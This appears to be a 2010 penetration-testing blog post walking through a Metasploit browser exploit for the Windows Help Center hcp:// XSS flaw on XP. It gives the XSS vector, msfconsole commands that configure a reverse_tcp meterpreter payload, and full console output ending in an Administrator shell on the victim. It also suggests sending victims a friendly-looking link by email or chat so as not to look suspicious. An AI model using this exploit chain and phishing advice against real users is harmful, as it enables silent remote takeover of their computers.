I Just saw this exploit in full disclosure and ExploitDB:
http://seclists.org/fulldisclosure/2010/Jun/205
http://www.exploit-db.com/exploits/13808/
http://www.exploit-db.com/exploits/13808/
Then I checked in metasploit and the exploit is already available.
If you are on an internal or client side test penetration test I generally see most clients running windows XP and generally outdated browsers. They are either using IE6 or IE7 or IE8.... The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed.
<script defer>code</script>
"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "
This exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7.... IE 6 and IE7 browsers are vulnerable to this attack however IE8 works but with a user popup box unless the victim is running certain versions of media player... I also just tested this with a IE8 browser running in comparability mode... When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell wooooot
I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...
Module Name:
ms10_xxx_helpctr_xss_cmd_exec
Below is a description and then usage of the module... give it a try...
Description: (From Metasploit)
"Help and Support Center is the default application provided to
access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme "hcp". Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden."
Simple Usage Example:
msf > use windows/browser/ms10_xxx_
msf exploit(ms10_xxx_helpctr_xss_
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_
LHOST => 192.168.1.10
msf exploit(ms10_xxx_helpctr_xss_
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.10:5555
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.10:80/
[*] Server started.
Send Your Link to the Victim and wait:
Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.
msf exploit(ms10_xxx_helpctr_xss_
[*] Sending Microsoft Help Center XSS and Command Execution to 192.168.1.11:1295...
[*] Responding to request for exploit iframe at 192.168.1.11:1295...
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from 192.168.1.11:1305
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.11:1305
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.10:5555 -> 192.168.1.11:1306) at Fri Jun 11 18:10:38 -0400 2010
msf exploit(ms10_xxx_helpctr_xss_
Active sessions
===============
Id Type Information
-- ---- -----------
1 meterpreter EXPLOIT\Administrator @ EXPLOIT 192.168.1.10:5555 -> 192.168.1.11:1291
msf exploit(ms10_xxx_helpctr_xss_
[*] Starting interaction with 1...
meterpreter > getuid
Server username: EXPLOIT\Administrator
Final Notes:
There you have it... This module sets up a server and waits for your victim to make a connection, when the victim does make a connection their help window is opened and they are silently owned.... More then likely the victim will just think windows is acting up as it usually does or they accidentally clicked something :) :) Maybe you should be using freebsd or slackware instead? You might still get owned but at least you will know its not the OS acting up hahahaha
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.